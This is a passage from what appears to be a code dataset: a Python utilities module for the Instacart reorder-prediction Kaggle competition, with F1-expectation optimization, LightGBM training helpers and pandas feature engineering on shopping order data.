other\n","repo_name":"influxdata/influxdb-client-python","sub_path":"influxdb_client/domain/variable_links.py","file_name":"variable_links.py","file_ext":"py","file_size_in_byte":4082,"program_lang":"python","lang":"en","doc_type":"code","stars":629,"dataset":"github-code","pt":"72"} +{"seq_id":"41058469894","text":"import pandas as pd\nimport numpy as np\nfrom multiprocessing import Pool, cpu_count\nimport os.path\nimport gc\nimport pickle\n\n# Thanks to https://www.kaggle.com/onodera/multilabel-fscore\ndef multilabel_fscore(y_true, y_pred):\n if not isinstance(y_pred, np.ndarray):\n y_pred = np.array([y_pred])\n\n precision = sum([1 for i in y_pred if i in y_true]) / len(y_pred)\n recall = sum([1 for i in y_true if i in y_pred]) / len(y_true)\n denom = (precision + recall)\n if denom == 0:\n denom = 1\n return (2 * precision * recall) / denom\n\n\ndef applyParallel(dfGrouped, func):\n with Pool(cpu_count()) as p:\n ret_list = p.map(func, [group for name, group in dfGrouped])\n return pd.concat(ret_list)\n\n\n\n#####################\n# https://www.kaggle.com/mmueller/f1-score-expectation-maximization-in-o-n/code\n\nimport matplotlib.pylab as plt\nfrom datetime import datetime\nfrom numba import jit\n\nclass F1Optimizer():\n def __init__(self):\n pass\n\n @staticmethod\n @jit\n def get_expectations(P, pNone=None):\n expectations = []\n P = np.sort(P)[::-1]\n\n n = np.array(P).shape[0]\n DP_C = np.zeros((n + 2, n + 1))\n if pNone is None:\n pNone = (1.0 - P).prod()\n\n DP_C[0][0] = 1.0\n for j in range(1, n):\n DP_C[0][j] = (1.0 - P[j - 1]) * DP_C[0, j - 1]\n\n for i in range(1, n + 1):\n DP_C[i, i] = DP_C[i - 1, i - 1] * P[i - 1]\n for j in range(i + 1, n + 1):\n DP_C[i, j] = P[j - 1] * DP_C[i - 1, j - 1] + (1.0 - P[j - 1]) * DP_C[i, j - 1]\n\n DP_S = np.zeros((2 * n + 1,))\n DP_SNone = np.zeros((2 * n + 1,))\n for i in range(1, 2 * n + 1):\n DP_S[i] = 1. / (1. * i)\n DP_SNone[i] = 1. / (1. * i + 1)\n for k in range(n + 1)[::-1]:\n f1 = 0\n f1None = 0\n for k1 in range(n + 1):\n f1 += 2 * k1 * DP_C[k1][k] * DP_S[k + k1]\n f1None += 2 * k1 * DP_C[k1][k] * DP_SNone[k + k1]\n for i in range(1, 2 * k - 1):\n DP_S[i] = (1 - P[k - 1]) * DP_S[i] + P[k - 1] * DP_S[i + 1]\n DP_SNone[i] = (1 - P[k - 1]) * DP_SNone[i] + P[k - 1] * DP_SNone[i + 1]\n expectations.append([f1None + 2 * pNone / (2 + k), f1])\n\n return np.array(expectations[::-1]).T\n\n @staticmethod\n @jit\n def maximize_expectation(P, pNone=None):\n expectations = F1Optimizer.get_expectations(P, pNone)\n\n ix_max = np.unravel_index(expectations.argmax(), expectations.shape)\n max_f1 = expectations[ix_max]\n\n predNone = True if ix_max[0] == 0 else False\n best_k = ix_max[1]\n\n return best_k, predNone, max_f1\n\n @staticmethod\n def _F1(tp, fp, fn):\n return 2 * tp / (2 * tp + fp + fn)\n\n @staticmethod\n def _Fbeta(tp, fp, fn, beta=1.0):\n beta_squared = beta ** 2\n return (1.0 + beta_squared) * tp / ((1.0 + beta_squared) * tp + fp + beta_squared * fn)\n\n\ndef print_best_prediction(P, pNone=None):\n print(\"Maximize F1-Expectation\")\n print(\"=\" * 23)\n P = np.sort(P)[::-1]\n n = P.shape[0]\n L = ['L{}'.format(i + 1) for i in range(n)]\n\n if pNone is None:\n print(\"Estimate p(None|x) as (1-p_1)*(1-p_2)*...*(1-p_n)\")\n pNone = (1.0 - P).prod()\n\n PL = ['p({}|x)={}'.format(l, p) for l, p in zip(L, P)]\n print(\"Posteriors: {} (n={})\".format(PL, n))\n print(\"p(None|x)={}\".format(pNone))\n\n opt = F1Optimizer.maximize_expectation(P, pNone)\n best_prediction = ['None'] if opt[1] else []\n best_prediction += (L[:opt[0]])\n f1_max = opt[2]\n\n print(\"Prediction {} yields best E[F1] of {}\\n\".format(best_prediction, f1_max))\n\n\ndef save_plot(P, filename='expected_f1.png'):\n E_F1 = pd.DataFrame(F1Optimizer.get_expectations(P).T, columns=[\"/w None\", \"/wo None\"])\n best_k, _, max_f1 = F1Optimizer.maximize_expectation(P)\n\n plt.style.use('ggplot')\n plt.figure()\n E_F1.plot()\n plt.title('Expected F1-Score for \\n {}'.format(\"P = [{}]\".format(\",\".join(map(str, P)))), fontsize=12)\n plt.xlabel('k')\n plt.xticks(np.arange(0, len(P) + 1, 1.0))\n plt.ylabel('E[F1(P,k)]')\n plt.plot([best_k], [max_f1], 'o', color='#000000', markersize=4)\n plt.annotate('max E[F1(P,k)] = E[F1(P,{})] = {:.5f}'.format(best_k, max_f1), xy=(best_k, max_f1),\n xytext=(best_k, max_f1 * 0.8), arrowprops=dict(facecolor='black', shrink=0.05, width=1, headwidth=7),\n horizontalalignment='center', verticalalignment='top')\n plt.gcf().savefig(filename)\n\n\n\ndef timeit(P):\n s = datetime.now()\n F1Optimizer.maximize_expectation(P)\n e = datetime.now()\n return (e-s).microseconds / 1E6\n\n\ndef benchmark(n=100, filename='runtimes.png'):\n results = pd.DataFrame(index=np.arange(1,n+1))\n results['runtimes'] = 0\n\n for i in range(1,n+1):\n runtimes = []\n for j in range(5):\n runtimes.append(timeit(np.sort(np.random.rand(i))[::-1]))\n results.iloc[i-1] = np.mean(runtimes)\n\n x = results.index\n y = results.runtimes\n results['quadratic fit'] = np.poly1d(np.polyfit(x, y, deg=2))(x)\n\n plt.style.use('ggplot')\n plt.figure()\n results.plot()\n plt.title('Expectation Maximization Runtimes', fontsize=12)\n plt.xlabel('n = |P|')\n plt.ylabel('time in seconds')\n plt.gcf().savefig(filename)\n\n\n#####################\nfrom sklearn.model_selection import ParameterGrid\n#from ggplot import *\nimport time\nimport lightgbm as lgb\nimport pandas as pd\n\n\ndef grid_search(lgb_train, lgb_valid, param_grid, early_stopping_rounds=150):\n \"\"\"\"\n param_grid = {'eta': [0.1], 'max_depth': [4, 6], 'subsample': [0.8, 1]}\n grid_search(lgb_train, lgb_valid, param_grid)\n \"\"\"\n grid = ParameterGrid(param_grid)\n data = pd.DataFrame(list(grid))\n data['time'] = 0\n data['best_score'] = 0\n data['best_iter'] = 0\n\n for i, params in enumerate(grid):\n print(\"Etape \" + str(i + 1))\n start = time.time()\n #ipdb.set_trace()\n model = lgb.train(params, lgb_train, 100000, valid_sets=[lgb_train, lgb_valid],\n early_stopping_rounds=early_stopping_rounds, verbose_eval=50)\n\n end = time.time()\n data.loc[i,'time'] = end - start\n data.loc[i,'best_score'] = model.best_score['valid_1'][params['metric']]\n data.loc[i,'best_iter'] = model.best_iteration\n return data\n\n#########\ndef read_data():\n aisles = pd.read_csv(\"./data/aisles.csv\")\n departments = pd.read_csv(\"./data/departments.csv\")\n order_prior = pd.read_csv(\"./data/order_products__prior.csv\")\n order_train = pd.read_csv(\"./data/order_products__train.csv\")\n orders = pd.read_csv(\"./data/orders.csv\")\n products = pd.read_csv(\"./data/products.csv\")\n\n # orders = orders.groupby(\"user_id\").\\\n # apply(utils.add_fe_to_orders)\n\n # pickle.dump(orders, open(\"orders.p\", \"wb\"))\n orders = pickle.load(open(\"orders.p\", \"rb\"))\n product2vec = pickle.load(open(\"product2vec.p\", \"rb\"))\n #product2vec = pd.read_csv(\"./data/product_embeddings.csv\").drop([\"product_name\", \"aisle_id\", \"department_id\"], axis=1)\n return aisles, departments, order_prior, order_train, orders, products, product2vec\n\n# Fucking slow :/ - So i pickled it\n# Way faster & easier with dplyr...\ndef add_fe_to_orders(group):\n group[\"date\"] = group.iloc[::-1]['days_since_prior_order'].cumsum()[::-1].shift(-1).fillna(0)\n max_group = group[\"order_number\"].max()\n group[\"order_number_reverse\"] = max_group - group[\"order_number\"]\n return group\n\ndef get_products_fe(order_prior):\n products_fe = order_prior. \\\n groupby([\"product_id\"]). \\\n agg({'reordered': {'p_reorder_rt': \"mean\", 'p_count': \"size\"}, \\\n 'add_to_cart_order': {\"p_add_to_cart_order\": \"mean\"}, \\\n 'order_number': {\"P_recency_order\": \"mean\"}, \\\n 'order_number_reverse': {\"P_recency_order_r\": \"mean\"}, \\\n 'date': {\"P_recency_date\": \"mean\"}})\n\n products_fe.columns = products_fe.columns.droplevel(0)\n products_fe = products_fe.reset_index()\n\n # bool_reordered = if a product is bought once, prob to be reordered at least once\n up_fe2 = order_prior.groupby([\"user_id\", \"product_id\"]).agg(\"size\").rename(\"up_nb_ordered\").reset_index()\n up_fe2[\"bool_reordered\"] = (up_fe2[\"up_nb_ordered\"] > 1).astype(\"int\")\n\n products_fe2 = up_fe2.groupby('product_id')[\"bool_reordered\"]. \\\n agg([\"mean\", \"size\"]).reset_index(). \\\n rename(index=str, columns={\"mean\": \"p_reorder_rt_bool\", \"size\": \"p_active_user\"})\n\n products_fe = pd.merge(products_fe, products_fe2, how=\"left\", on=\"product_id\")\n del products_fe2\n\n # Product trend in a way\n products_trend = order_prior.query(\"order_number_reverse < 3\"). \\\n groupby([\"product_id\", \"order_number_reverse\"]).size(). \\\n rename(\"p_size\").reset_index()\n\n products_trend[\"p_trend_rt\"] = products_trend[\"p_size\"] / products_trend[\"p_size\"].shift(-1)\n products_trend[\"p_trend_diff\"] = products_trend[\"p_size\"] - products_trend[\"p_size\"].shift(-1)\n\n cond = products_trend[\"product_id\"] != products_trend[\"product_id\"].shift(-1)\n products_trend.loc[cond, \"p_trend_rt\"] = np.nan\n products_trend.loc[cond, \"p_trend_diff\"] = np.nan\n products_trend = products_trend.query(\"order_number_reverse == 1\").drop(\"order_number_reverse\", 1)\n\n products_fe = pd.merge(products_fe, products_trend, how=\"left\", on=\"product_id\")\n\n del cond, products_trend\n\n product_freq = order_prior.copy()\n product_freq = product_freq.sort_values([\"user_id\", \"product_id\", \"order_number\"])\n\n product_freq[\"p_freq_days\"] = product_freq[\"date\"].shift() - product_freq[\"date\"]\n product_freq[\"p_freq_order\"] = product_freq[\"order_number\"] - product_freq[\"order_number\"].shift()\n product_freq = product_freq.query(\"reordered == 1\")\n\n product_freq = product_freq.groupby(\"product_id\"). \\\n agg({'p_freq_days': {'p_freq_days': \"mean\"}, \\\n 'p_freq_order': {'p_freq_order': \"mean\"}})\n\n product_freq.columns = product_freq.columns.droplevel(0)\n product_freq = product_freq.reset_index()\n\n products_fe = pd.merge(products_fe, product_freq, how=\"left\", on=\"product_id\")\n\n del product_freq\n\n return products_fe\n\n\ndef get_products_fe_mod(order_prior, order_train, nfold=5):\n order_train = order_train.copy()\n order_train[\"user_fold\"] = order_train[\"user_id\"].mod(nfold)\n\n products_fe_mod=[]\n for fold in range(nfold):\n #print(\"Folder: \" + str(fold))\n order_train_tmp = order_train.query(\"user_fold != @fold\").drop(\"user_fold\", axis=1)\n order_train_tmp = pd.concat([order_prior, order_train_tmp])\n products_fe_tmp = get_products_fe(order_train_tmp)\n products_fe_tmp[\"user_fold\"] = fold\n products_fe_mod.append(products_fe_tmp)\n\n products_fe_mod = pd.concat(products_fe_mod)\n\n return products_fe_mod\n\n\ndef get_users_fe(orders, order_prior):\n users_fe = order_prior. \\\n groupby(\"user_id\"). \\\n agg({'reordered': {'U_rt_reordered': 'mean'}})\n\n users_fe.columns = users_fe.columns.droplevel(0)\n users_fe = users_fe.reset_index()\n\n # User basket sum, mean, std\n # TODO same but only on reordered products?\n users_fe2 = order_prior. \\\n groupby([\"user_id\", \"order_id\"]).size(). \\\n reset_index(). \\\n drop(\"order_id\", axis=1). \\\n groupby(\"user_id\"). \\\n agg([np.sum, np.mean, np.std])\n\n users_fe2.columns = [\"U_basket_sum\", \"U_basket_mean\", \"U_basket_std\"]\n users_fe2 = users_fe2.reset_index()\n\n users_fe = pd.merge(users_fe, users_fe2, on=\"user_id\")\n del users_fe2\n\n # u_active_p == user distinct products\n # bool_reordered = if a product is bought once, prob to be reordered at least once\n up_fe2 = order_prior.groupby([\"user_id\", \"product_id\"]).agg(\"size\").rename(\"up_nb_ordered\").reset_index()\n up_fe2[\"bool_reordered\"] = (up_fe2[\"up_nb_ordered\"] > 1).astype(\"int\")\n\n users_fe4 = up_fe2.groupby('user_id')[\"bool_reordered\"]. \\\n agg([\"mean\", \"size\"]).reset_index(). \\\n rename(index=str, columns={\"mean\": \"u_reorder_rt_bool\", \"size\": \"u_active_p\"})\n\n users_fe = pd.merge(users_fe, users_fe4, on=\"user_id\")\n del users_fe4\n\n users_fe5 = orders.query(\"order_number_reverse != 0\"). \\\n groupby(\"user_id\"). \\\n agg({'date': {'U_date_inscription': 'max'}, \\\n 'days_since_prior_order': {'U_days_since_mean': 'mean', \\\n 'U_days_since_std': 'std'}})\n\n users_fe5.columns = users_fe5.columns.droplevel(0)\n users_fe5 = users_fe5.reset_index()\n\n users_fe = pd.merge(users_fe, users_fe5, on=\"user_id\")\n del users_fe5\n\n # TODO U_none_reordered_strike\n # New way\n # TODO test if it's help or not, keeping it might be used as a skrinking term\n # .query(\"order_number !=1\")\n user_fe_none = order_prior. \\\n groupby([\"order_id\", \"user_id\"]). \\\n agg({'reordered': {'reordered': \"sum\"}, \\\n 'order_number_reverse': {'order_number_reverse': 'first'}})\n\n user_fe_none.columns = user_fe_none.columns.droplevel(0)\n user_fe_none = user_fe_none.reset_index()\n\n user_fe_none[\"reordered\"] = (user_fe_none[\"reordered\"] < 1).astype(int)\n user_fe_none[\"U_none_reordered_strike\"] = user_fe_none[\"reordered\"] * 1 / 2 ** (\n user_fe_none[\"order_number_reverse\"])\n\n user_fe_none = user_fe_none. \\\n groupby(\"user_id\"). \\\n agg({'reordered': {'U_none_reordered_mean': \"mean\"}, \\\n 'U_none_reordered_strike': {'U_none_reordered_strike': \"sum\"}})\n\n user_fe_none.columns = user_fe_none.columns.droplevel(0)\n user_fe_none = user_fe_none.reset_index()\n\n users_fe = pd.merge(users_fe, user_fe_none, on=\"user_id\")\n del user_fe_none\n return users_fe\n\n\ndef get_users_products(order_prior):\n # Could be something else than 1/2\n order_prior[\"UP_date_strike\"] = 1 / 2 ** (order_prior[\"date\"] / 7)\n # order_prior[\"UP_order_strike\"] = 100000 * 1/2 ** (order_prior[\"order_number_reverse\"])\n order_prior[\"UP_order_strike\"] = 1 / 2 ** (order_prior[\"order_number_reverse\"])\n\n users_products = order_prior. \\\n groupby([\"user_id\", \"product_id\"]). \\\n agg({'reordered': {'up_nb_reordered': \"size\"}, \\\n 'add_to_cart_order': {'up_add_to_cart_order_mean': \"mean\"}, \\\n 'add_to_cart_order_relative': {'up_add_to_cart_order_relative_mean': \"mean\"}, \\\n 'add_to_cart_order_inverted': {'up_add_to_cart_order_inverted_mean': \"mean\"}, \\\n 'order_number_reverse': {'up_last_order_number': \"min\", 'up_first_order_number': \"max\"}, \\\n 'date': {'up_last_order_date': \"min\", 'up_first_date_number': \"max\"}, \\\n 'UP_date_strike': {\"UP_date_strike\": \"sum\"}, \\\n 'UP_order_strike': {\"UP_order_strike\": \"sum\"}})\n\n users_products.columns = users_products.columns.droplevel(0)\n users_products = users_products.reset_index()\n return users_products\n\n\ndef get_users_products_none(users_products):\n users_products_none = users_products.groupby(\"user_id\"). \\\n agg({'UP_date_strike': {'O_date_strike_max': \"max\", 'O_date_strike_sum': \"sum\", 'O_date_strike_mean': \"mean\"}, \\\n 'UP_order_strike': {'O_order_strike_max': \"max\", 'O_order_strike_sum': \"sum\",\n 'O_date_order_mean': \"mean\"}})\n\n users_products_none.columns = users_products_none.columns.droplevel(0)\n users_products_none = users_products_none.reset_index()\n return users_products_none\n\n\ndef get_aisles_fe(order_prior, products, aisles):\n aisles_order = pd.merge(order_prior, products, on=\"product_id\")\n aisles_order = pd.merge(aisles_order, aisles, on=\"aisle_id\")\n\n aisles_fe = aisles_order. \\\n groupby([\"aisle_id\"]). \\\n agg({'reordered': {'a_reorder_rt': \"mean\", 'a_count': \"size\"}, \\\n 'add_to_cart_order': {\"a_add_to_cart_order\": \"mean\"}})\n\n aisles_fe.columns = aisles_fe.columns.droplevel(0)\n aisles_fe = aisles_fe.reset_index()\n\n # bool_reordered = if a product is bought once, prob to be reordered at least once\n aisles_fe2 = aisles_order.groupby([\"user_id\", \"aisle_id\"]).agg(\"size\").rename(\"UA_nb_ordered\").reset_index()\n aisles_fe2[\"UA_bool_reordered\"] = (aisles_fe2[\"UA_nb_ordered\"] > 1).astype(\"int\")\n\n aisles_fe2 = aisles_fe2.groupby('aisle_id')[\"UA_bool_reordered\"]. \\\n agg([\"mean\", \"size\"]).reset_index(). \\\n rename(index=str, columns={\"mean\": \"a_reorder_rt_bool\", \"size\": \"a_active_user\"})\n\n aisles_fe = pd.merge(aisles_fe, aisles_fe2, how=\"left\", on=\"aisle_id\")\n del aisles_fe2\n return aisles_fe\n\n\ndef get_user_aisle_fe(order_prior, products, aisles, users_fe):\n aisles_order = pd.merge(order_prior, products, on=\"product_id\")\n aisles_order = pd.merge(aisles_order, aisles, on=\"aisle_id\")\n user_aisle_fe = aisles_order. \\\n groupby([\"user_id\", \"aisle_id\"]). \\\n agg({'product_id': {\"UA_product_rt\": \"nunique\"}})\n\n user_aisle_fe.columns = user_aisle_fe.columns.droplevel(0)\n user_aisle_fe = user_aisle_fe.reset_index()\n\n user_aisle_fe = pd.merge(user_aisle_fe, users_fe[[\"user_id\", \"u_active_p\"]], how=\"left\", on=\"user_id\")\n user_aisle_fe[\"UA_product_rt\"] = user_aisle_fe[\"UA_product_rt\"] / user_aisle_fe[\"u_active_p\"]\n user_aisle_fe = user_aisle_fe.drop(\"u_active_p\", axis=1)\n return user_aisle_fe\n\n\ndef get_departments_fe(order_prior, products, aisles, departments):\n departments_order = pd.merge(order_prior, products, on=\"product_id\")\n departments_order = pd.merge(departments_order, aisles, on=\"aisle_id\")\n departments_order = pd.merge(departments_order, departments, on=\"department_id\")\n\n departments_fe = departments_order. \\\n groupby([\"department_id\"]). \\\n agg({'reordered': {'d_reorder_rt': \"mean\", 'd_count': \"size\"}, \\\n 'add_to_cart_order': {\"d_add_to_cart_order\": \"mean\"}})\n\n departments_fe.columns = departments_fe.columns.droplevel(0)\n departments_fe = departments_fe.reset_index()\n\n # bool_reordered = if a product is bought once, prob to be reordered at least once\n departments_fe2 = departments_order.groupby([\"user_id\", \"department_id\"]).agg(\"size\").rename(\n \"UD_nb_ordered\").reset_index()\n departments_fe2[\"UD_bool_reordered\"] = (departments_fe2[\"UD_nb_ordered\"] > 1).astype(\"int\")\n\n departments_fe2 = departments_fe2.groupby('department_id')[\"UD_bool_reordered\"]. \\\n agg([\"mean\", \"size\"]).reset_index(). \\\n rename(index=str, columns={\"mean\": \"d_reorder_rt_bool\", \"size\": \"d_active_user\"})\n\n departments_fe = pd.merge(departments_fe, departments_fe2, how=\"left\", on=\"department_id\")\n del departments_fe2\n return departments_fe\n\n\ndef get_user_department_fe(order_prior, products, aisles, departments, users_fe):\n departments_order = pd.merge(order_prior, products, on=\"product_id\")\n departments_order = pd.merge(departments_order, aisles, on=\"aisle_id\")\n departments_order = pd.merge(departments_order, departments, on=\"department_id\")\n\n user_department_fe = departments_order. \\\n groupby([\"user_id\", \"department_id\"]). \\\n agg({'product_id': {\"UD_product_rt\": \"nunique\"}})\n\n user_department_fe.columns = user_department_fe.columns.droplevel(0)\n user_department_fe = user_department_fe.reset_index()\n\n user_department_fe = pd.merge(user_department_fe, users_fe[[\"user_id\", \"u_active_p\"]], how=\"left\", on=\"user_id\")\n user_department_fe[\"UD_product_rt\"] = user_department_fe[\"UD_product_rt\"] / user_department_fe[\"u_active_p\"]\n user_department_fe = user_department_fe.drop(\"u_active_p\", axis=1)\n return user_department_fe\n\n\ndef get_user_past_product(order_prior, orders, order_train):\n user_past_product = order_prior[[\"user_id\", \"product_id\"]].drop_duplicates()\n\n reordered_train = pd.merge(orders, order_train, on=[\"order_id\", \"user_id\"])\n reordered_train = reordered_train.query(\"reordered == 1\")\n\n user_past_product = pd.merge(user_past_product, reordered_train[[\"user_id\", \"product_id\", \"reordered\"]],\n on=[\"user_id\", \"product_id\"], how=\"left\")\n\n user_past_product[\"reordered\"] = user_past_product[\"reordered\"].fillna(0)\n return user_past_product\n\n\ndef get_order_none(order_train):\n order_none = order_train. \\\n groupby([\"order_id\", \"user_id\"])[\"reordered\"].sum(). \\\n reset_index()\n\n order_none[\"reordered\"] = (order_none[\"reordered\"] < 1).astype(int)\n return order_none\n\n\ndef get_df(df, user_past_product, users_fe, products_fe_mod, products, aisles,\n aisles_fe, departments, departments_fe, users_products, product2vec, user_aisle_fe,\n user_department_fe, nfold=5):\n df_set = pd.merge(df, user_past_product, on=[\"user_id\"])\n df_set = pd.merge(df_set, users_fe, on=\"user_id\")\n\n df_set[\"user_fold\"] = df_set[\"user_id\"].mod(nfold)\n df_set = pd.merge(df_set, products_fe_mod, how='left', on=[\"product_id\",\"user_fold\"])\n #df_set = pd.merge(df_set, products_fe, how='left', on=\"product_id\")\n\n df_set = pd.merge(df_set, products, how='left', on=\"product_id\")\n df_set = pd.merge(df_set, aisles, how='left', on=\"aisle_id\")\n df_set = pd.merge(df_set, aisles_fe, how='left', on=\"aisle_id\")\n df_set = pd.merge(df_set, departments, how='left', on=\"department_id\")\n df_set = pd.merge(df_set, departments_fe, how='left', on=\"department_id\")\n df_set = pd.merge(df_set, users_products, how='left', on=[\"user_id\", \"product_id\"])\n df_set = pd.merge(df_set, product2vec, how='left', on=\"product_id\")\n df_set = pd.merge(df_set, user_aisle_fe, how='left', on=[\"user_id\", \"aisle_id\"])\n df_set = pd.merge(df_set, user_department_fe, how='left', on=[\"user_id\", \"department_id\"])\n\n # Should be done in appropriate place\n df_set[\"UP_rt_reordered\"] = df_set[\"up_nb_reordered\"] / df_set[\"order_number\"] # Maybe delete because it might overfit?\n df_set[\"UP_rt_reordered_since_first\"] = df_set[\"up_nb_reordered\"] / df_set[\"up_first_order_number\"]\n df_set[\"UP_days_no-reordered\"] = df_set[\"up_last_order_date\"] - df_set[\"date\"]\n df_set[\"UP_freq_nb_no-reordered\"] = df_set[\"up_last_order_number\"] / df_set[\"p_freq_order\"]\n df_set[\"UP_freq_days_no-reordered\"] = df_set[\"UP_days_no-reordered\"] / df_set[\"p_freq_days\"]\n df_set[\"UP_sum_basket_rt\"] = df_set[\"up_nb_reordered\"] / df_set[\"U_basket_sum\"]\n df_set[\"O_days_since_prior_order_diff\"] = df_set[\"days_since_prior_order\"] - df_set[\"U_days_since_mean\"]\n df_set[\"O_days_since_prior_order_rt\"] = df_set[\"days_since_prior_order\"] / df_set[\"U_days_since_mean\"]\n\n df_set = df_set.drop(\"user_fold\", 1)\n return df_set\n\n\ndef get_mult_none(df, X_df, model_gbm):\n df_pred = df[[\"order_id\", \"user_id\"]].copy()\n df_pred[\"pred\"] = model_gbm.predict(X_df, num_iteration=model_gbm.best_iteration)\n df_pred[\"pred_minus\"] = 1 - df_pred[\"pred\"]\n\n df_pred = df_pred.groupby([\"order_id\", \"user_id\"]). \\\n agg({'pred_minus': {'pred_none_prod': \"prod\"}, \\\n 'pred': {'pred_basket_sum': \"sum\", 'pred_basket_std':'std'}})\n\n df_pred.columns = df_pred.columns.droplevel(0)\n df_pred = df_pred.reset_index()\n\n return df_pred\n\n\ndef get_mult_none_cv(df_full, df_test, param, early_stopping_rounds=150, nfold=5):\n to_drop = [\"order_id\", \"user_id\", \"eval_set\", \"product_id\", \"product_name\", \"department\", \"aisle\", \\\n \"order_number_reverse\", \"date\", \"UP_days_no-reordered\"]\n\n res=[]\n res_test = []\n\n X_test = df_test.drop(to_drop + [\"reordered\"], axis=1)\n\n for fold in range(nfold):\n print(\"Folder: \" + str(fold))\n df_valid = df_full.query(\"(user_id % @nfold) == @fold\")\n df_train = df_full.query(\"(user_id % @nfold) != @fold\")\n X_train = df_train.drop(to_drop + [\"reordered\"], axis=1)\n X_valid = df_valid.drop(to_drop + [\"reordered\"], axis=1)\n y_train = df_train[\"reordered\"]\n y_valid = df_valid[\"reordered\"]\n\n lgb_train = lgb.Dataset(X_train, label=y_train)\n lgb_valid = lgb.Dataset(X_valid, label=y_valid)\n model_gbm = lgb.train(param, lgb_train, 100000, valid_sets=[lgb_train, lgb_valid], early_stopping_rounds=early_stopping_rounds,\n verbose_eval=100)\n res.append(get_mult_none(df_valid, X_valid, model_gbm))\n res_test.append(get_mult_none(df_test, X_test, model_gbm))\n del lgb_train, lgb_valid, model_gbm\n gc.collect()\n\n res = pd.concat(res)\n res_test = pd.concat(res_test)\n res_test = res_test.groupby([\"order_id\", \"user_id\"]).mean().reset_index()\n res = pd.concat([res, res_test])\n return res\n\n\ndef add_old_orders(df_full, df_full_none, df_full_old, df_full_none_old):\n df_col = df_full.columns.tolist()\n df_col_none = df_full_none.columns.tolist()\n df_full = pd.concat([df_full, df_full_old])\n df_full_none = pd.concat([df_full_none, df_full_none_old])\n df_full = df_full[df_col]\n df_full_none = df_full_none[df_col_none]\n return df_full, df_full_none\n\n\ndef get_df_none(df, order_none, users_fe):\n df_set = pd.merge(df, order_none, on=[\"order_id\", \"user_id\"], how=\"left\")\n df_set = pd.merge(df_set, users_fe, on=\"user_id\", how=\"left\")\n #df_set = pd.merge(df_set, mult_none_cv, on=[\"order_id\", \"user_id\"], how=\"left\")\n df_set[\"O_days_since_prior_order_diff\"] = df_set[\"days_since_prior_order\"] - df_set[\"U_days_since_mean\"]\n df_set[\"O_days_since_prior_order_rt\"] = df_set[\"days_since_prior_order\"] / df_set[\"U_days_since_mean\"]\n return df_set\n\n\ndef get_df_none_add(df_set, mult_none_cv):\n df_set = pd.merge(df_set, mult_none_cv, on=[\"order_id\", \"user_id\"], how=\"left\")\n return df_set\n\n\ndef get_df_pred(df, X_df, df_none, X_df_none, model_gbm, model_gbm_none):\n df = df.copy()\n df_none = df_none.copy()\n df[\"pred\"] = model_gbm.predict(X_df, num_iteration=model_gbm.best_iteration)\n df_none[\"pred\"] = np.clip(model_gbm_none.predict(X_df_none, num_iteration=model_gbm_none.best_iteration), 0,1)\n df_none[\"product_id\"] = \"None\"\n df_pred_none = df_none[[\"order_id\", \"user_id\", \"product_id\", \"pred\"]].copy()\n\n # Copy avoid warning\n df_pred = df[[\"order_id\", \"user_id\", \"product_id\", \"pred\"]].copy()\n\n df_test_pred = pd.concat([df_pred, df_pred_none])\n return df_test_pred\n\n\ndef calibrate_none(df_pred, none_penalisation=0):\n df_pred = df_pred.copy()\n cond = df_pred[\"product_id\"] == 'None'\n df_pred.loc[cond, \"pred\"] = df_pred.loc[cond, \"pred\"] - none_penalisation\n return df_pred\n\n\ndef groupby_optimised_pred(group):\n group_none = group.iloc[0:1]\n none_gain = group_none[\"pred\"].values[0]\n group_no_none = group.iloc[1:]\n group_no_none[\"precision\"] = group_no_none[\"pred\"].expanding().mean()\n group_no_none[\"precision_none\"] = (group_no_none[\"pred\"].expanding().sum()) / (group_no_none.expanding()[\"pred\"].count() + 1)\n group_no_none[\"recall\"] = group_no_none[\"pred\"].expanding().sum() / (group_no_none[\"pred\"].sum() - 0)\n group_no_none[\"f_score\"] = (2 * group_no_none[\"precision\"] * group_no_none[\"recall\"]) / \\\n (group_no_none[\"precision\"] + group_no_none[\"recall\"])\n group_no_none[\"f_score_none\"] = (2 * group_no_none[\"precision_none\"] * group_no_none[\"recall\"]) / \\\n (group_no_none[\"precision_none\"] + group_no_none[\"recall\"]) + none_gain\n\n if group_no_none[\"f_score\"].max() > group_no_none[\"f_score_none\"].max():\n max_score = group_no_none[\"f_score\"].max()\n max_index = np.where(group_no_none[\"f_score\"] == group_no_none[\"f_score\"].max())[0][0]\n else:\n max_score = group_no_none[\"f_score_none\"].max()\n max_index = np.where(group_no_none[\"f_score_none\"] == group_no_none[\"f_score_none\"].max())[0][0]\n\n group_no_none = group_no_none[0:(max_index + 1)]\n\n res = group_no_none # .drop([\"precision\", \"recall\", \"f_score\"], axis=1)\n\n if none_gain > max_score + 0.0:\n res = group_none\n\n # if (none_gain > group_no_none[\"pred\"].values[0] + 0.11): #Worsen score, need to understand why\n # res = group_none\n\n return res\n\n\ndef groupby_optimised_pred(group):\n group_none = group.iloc[0:1]\n none_gain = group_none[\"pred\"].values[0]\n group_no_none = group.iloc[1:]\n group_no_none[\"precision\"] = group_no_none[\"pred\"].expanding().mean()\n basket_size = group_no_none[\"pred\"].sum() #0.75 #- 0.10 # Empirically found, could be finest, f-score is asymetric\n group_no_none[\"recall\"] = group_no_none[\"pred\"].expanding().sum() / basket_size\n group_no_none[\"f_score\"] = (2 * group_no_none[\"precision\"] * group_no_none[\"recall\"]) / (group_no_none[\"precision\"] + group_no_none[\"recall\"])\n f_score = group_no_none[\"f_score\"].max()\n\n max_index = np.where(group_no_none[\"f_score\"] == f_score)[0][0]\n group_no_none = group_no_none[0:(max_index+1)] # Could be (max_index+k) with k>1 if the limit is risky maybe?\n\n # f_score_none is the expected f_score if we add none\n precision_none = (group_no_none[\"pred\"].sum()) / (group_no_none.shape[0] + 1)\n recall_none = group_no_none.iloc[-1][\"recall\"]\n f_score_none = (2 * precision_none * recall_none) / (precision_none + recall_none)\n\n res = group_no_none #.drop([\"precision\", \"recall\", \"f_score\"], axis=1)\n # Add none if it's worth it\n # 0.07 and not 0 because f_score is under-estimated, could be finest\n if none_gain - (f_score - f_score_none) > 0.07:\n res = pd.concat([res, group_none])\n\n if (none_gain > f_score + 0.0):\n res = group_none\n\n #if (none_gain > group_no_none[\"pred\"].values[0] + 0.11): #Worsen score, need to understand why\n # res = group_none\n\n return res\n\n\ndef filter_optimised_pred(df):\n df[\"is_none\"] = (df[\"product_id\"] == 'None').astype(int)\n df = df.sort_values([\"is_none\", \"pred\"], ascending=False).drop(\"is_none\", axis=1)\n df = df. \\\n groupby(\"user_id\"). \\\n apply(groupby_optimised_pred).reset_index(drop=True)\n 